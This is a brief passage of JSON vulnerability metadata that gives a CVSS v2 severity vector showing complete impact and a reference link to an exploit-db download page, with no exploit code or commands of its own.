"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15569/"}]}